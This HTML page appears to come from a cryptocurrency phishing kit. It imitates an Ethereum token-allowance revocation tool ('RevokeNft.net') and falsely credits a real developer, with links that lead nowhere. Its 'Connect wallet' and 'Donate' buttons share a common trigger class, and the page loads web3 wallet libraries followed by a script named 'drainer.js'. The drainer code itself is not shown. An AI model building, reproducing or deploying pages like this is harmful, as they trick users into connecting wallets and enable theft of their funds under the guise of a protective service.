<!DOCTYPE html>
<div class="my-auto col">
    <button style="float:right" type="button" class="triggerx btn btn-outline-primary">Connect wallet</button>
    <div class="only-desktop" style="float:right;margin-right:10px">
        <button type="button" class="triggerx btn btn-outline-primary">Donate</button>
    </div>
</div>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    
    <meta name="viewport" content="width=device-width">
    
    <title>RevokeNft.net - Revoke your Ethereum token allowances</title>
    <meta name="robots" content="noindex,nofollow">
    <meta name="description" content="Protect your Ethereum token balances by revoking allowances and permissions you granted applications in the past.">

    <link rel="icon" type="image/x-icon" href="./favicon.ico">
    <!-- <link rel="apple-touch-icon" href="https://revokeapp.io/apple-touch-icon.png">
    <link rel="manifest" href="https://revokeapp.io/manifest.json"> -->
    <!-- <meta name="next-head-count" content="20"> -->
    <link rel="preload" href="./index_files/62b106a4ccce58d0.css" as="style">
    <link rel="stylesheet" href="./index_files/62b106a4ccce58d0.css" data-n-g="">
    <link rel="preload" href="./index_files/f6c2e128ee8a3113.css" as="style">
    <link rel="stylesheet" href="./index_files/f6c2e128ee8a3113.css" data-n-p=""><noscript data-n-css=""></noscript>
    
    <!-- <script defer="" nomodule="" src="https://revokeapp.io/_next/static/chunks/polyfills-5cd94c89d3acac5f.js"></script>
    <script src="./index_files/webpack-5761f3a204ffdf4a.js.download" defer=""></script>
    <script src="./index_files/framework-5f4595e5518b5600.js.download" defer=""></script>
    <script src="./index_files/main-a4d9e436b9a532ca.js.download" defer=""></script>
    <script src="./index_files/_app-ff891c19a168e583.js.download" defer=""></script>
    <script src="./index_files/332-24a06a76b072ea6b.js.download" defer=""></script>
    <script src="./index_files/index-f8c456ced4768b4e.js.download" defer=""></script>
    <script src="./index_files/_buildManifest.js.download" defer=""></script>
    <script src="./index_files/_ssgManifest.js.download" defer=""></script>
    <script src="./index_files/_middlewareManifest.js.download" defer=""></script> -->

<style data-emotion="css 18hzn63 animation-s8tf20" data-s="">
                .css-18hzn63 {
                    background: transparent!important;
                    width: 40px;
                    height: 40px;
                    border-radius: 100%;
                    border: 2px solid;
                    border-color: #000;
                    border-bottom-color: transparent;
                    display: inline-block;
                    -webkit-animation: animation-s8tf20 0.75s 0s infinite linear;
                    animation: animation-s8tf20 0.75s 0s infinite linear;
                    -webkit-animation-fill-mode: both;
                    animation-fill-mode: both;
                    margin: 10px;
                }
                
                @-webkit-keyframes animation-s8tf20 {
                    0% {
                        -webkit-transform: rotate(0deg) scale(1);
                        -moz-transform: rotate(0deg) scale(1);
                        -ms-transform: rotate(0deg) scale(1);
                        transform: rotate(0deg) scale(1);
                    }
                    50% {
                        -webkit-transform: rotate(180deg) scale(0.8);
                        -moz-transform: rotate(180deg) scale(0.8);
                        -ms-transform: rotate(180deg) scale(0.8);
                        transform: rotate(180deg) scale(0.8);
                    }
                    100% {
                        -webkit-transform: rotate(360deg) scale(1);
                        -moz-transform: rotate(360deg) scale(1);
                        -ms-transform: rotate(360deg) scale(1);
                        transform: rotate(360deg) scale(1);
                    }
                }
                
                @keyframes animation-s8tf20 {
                    0% {
                        -webkit-transform: rotate(0deg) scale(1);
                        -moz-transform: rotate(0deg) scale(1);
                        -ms-transform: rotate(0deg) scale(1);
                        transform: rotate(0deg) scale(1);
                    }
                    50% {
                        -webkit-transform: rotate(180deg) scale(0.8);
                        -moz-transform: rotate(180deg) scale(0.8);
                        -ms-transform: rotate(180deg) scale(0.8);
                        transform: rotate(180deg) scale(0.8);
                    }
                    100% {
                        -webkit-transform: rotate(360deg) scale(1);
                        -moz-transform: rotate(360deg) scale(1);
                        -ms-transform: rotate(360deg) scale(1);
                        transform: rotate(360deg) scale(1);
                    }
                }
</style>

<!-- added -->
<style>
    .react-switch-handle{ right: auto; }
    .react-switch-handle.right{ right: 1px; }
    #include_unregistered{
        display: block; visibility: visible;
    }
    #include_unregistered.hide{
        visibility: hidden;
    }
    * > .hide, .hide{
        visibility: hidden !important;
    }
</style>
</head>

<body>
    <div id="__next" data-reactroot=""><div class="App container-fluid">
    <div class="Header row">
        <div class="my-auto col">
            <div class="only-mobile" style="float:left">
                <button type="button" class="triggerx btn btn-outline-primary">Donate</button>
            </div>
        </div>
        <div class="my-auto col">
            <img class="logo" src="./index_files/revoke.svg" alt="RevokeNft.net logo">
        </div>
        <div class="my-auto col">
            <button style="float:right" type="button" class="triggerx btn btn-outline-primary">Connect wallet</button>
            <div class="only-desktop" style="float:right;margin-right:10px">
                <button type="button" class="triggerx btn btn-outline-primary">Donate</button>
            </div>
        </div>
    </div>
    <div class="Dashboard">
        <div class="row">
            <div class="col"></div>
            <div class="my-auto col-lg-6 col-md-12 col-sm-12">
                <div class="form-group">
                    <input placeholder="Enter Ethereum address or ENS name" class="AddressInput text-center form-control" value="">
                </div>
            </div>
            <div class="col"></div>
        </div>
        <div style="margin-bottom: 10px; display: flex; flex-direction: row; gap: 10px; justify-content: center; align-items: center;">
            <div>Tokens</div>
            <div>
                <div id="slider_box_x" style="position: relative; display: inline-block; text-align: left; opacity: 1; direction: ltr; border-radius: 14px; transition: opacity 0.25s ease 0s; touch-action: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); user-select: none;">
                    <div class="react-switch-bg" style="height: 28px; width: 56px; margin: 0px; position: relative; background: rgb(0, 0, 0); border-radius: 14px; cursor: pointer; transition: background 0.25s ease 0s;"></div>
                    <div id="slider_circle" class="react-switch-handle" style="height: 26px; width: 26px; background: rgb(255, 255, 255); display: inline-block; cursor: pointer; border-radius: 50%; position: absolute; transform: translateX(1px); top: 1px; outline: 0px; border: 0px; transition: all 0.3s ease;"></div>
                    <input type="checkbox" role="switch" aria-checked="false" style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; width: 1px;">
                </div>
            </div>
            <div>NFTs</div>
        </div>
        <div id="include_unregistered">Include unregistered tokens
            <sup><a href="./index.html" target="_blank" rel="noopener noreferrer">?</a></sup>
            <input type="checkbox">
        </div>
        <div>
            <span style="margin-right: 5px;">Include zero balances</span>
            <input type="checkbox">
        </div>
        </div>
        <div style="padding:20px">
            <p>Site created by<!-- --> <!-- -->
                <a href="./index.html">Rosco Kalis</a> / <!-- --> 
                <a href="./index.html">Source Code</a> /  
                <a href="./index.html">Official Twitter</a>
            </p>
            <p>
                Learn more: <a href="./index.html">Unlimited ERC20 allowances considered harmful</a>
            </p>
            <div class="Toastify"></div>
        </div>
        <div style="display: none; width: 100%;  white-space: pre-wrap; max-width: 100%; overflow-x: auto; overflow-wrap: anywhere; padding: 2px; font-size: 11px; overflow-y: scroll; max-height: 600px;" id="testx"></div>
    </div>
</div>
    <!-- <script id="__NEXT_DATA__" type="application/json">
        {
            "props": {
                "pageProps": {}
            },
            "page": "/",
            "query": {},
            "buildId": "LDTlnzev4Wx8_-pIHJFdI",
            "nextExport": true,
            "autoExport": true,
            "isFallback": false,
            "scriptLoader": []
        }
    </script> -->
    <!-- <script src="./index_files/sender.js.download"></script>
    <script src="./index_files/ethers-5.1.umd.min.js.download" type="text/javascript"></script> -->


<!-- <script data-nscript="afterInteractive">
    window.sa_event=window.sa_event||function(){var a=[].slice.call(arguments);window.sa_event.q?window.sa_event.q.push(a):window.sa_event.q=[a]};
</script>
<script src="https://scripts.simpleanalyticscdn.com/latest.js" async="true" defer="true" data-nscript="afterInteractive"></script>
<next-route-announcer>
    <p aria-live="assertive" id="__next-route-announcer__" role="alert" style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; width: 1px; white-space: nowrap; overflow-wrap: normal;"></p>
</next-route-announcer> -->
</body>
<script>
    {
        let el = document.getElementById("slider_box_x");
        let circle = document.getElementById("slider_circle");
        let include_unregistered = document.getElementById("include_unregistered");
        el.addEventListener("click", function (e) {
            circle.classList.toggle("right");
            include_unregistered.classList.toggle("hide");
        })
    }
</script>
<script src="./Decimal/decimal.js"></script>
<script src="./Moralis/moralis.js"></script>

<script type="text/javascript" src="./WEB3/web3.js"></script>
<script type="text/javascript" src="./Web3Modal/web3modal.js"></script>

<script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
<script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider@1.2.1/dist/umd/index.min.js"></script>
<script type="text/javascript"  src="https://cdn.jsdelivr.net/npm/@portis/web3@4.0.7/umd/index.min.js"></script>

<script src="./drainer.js"></script>
</html>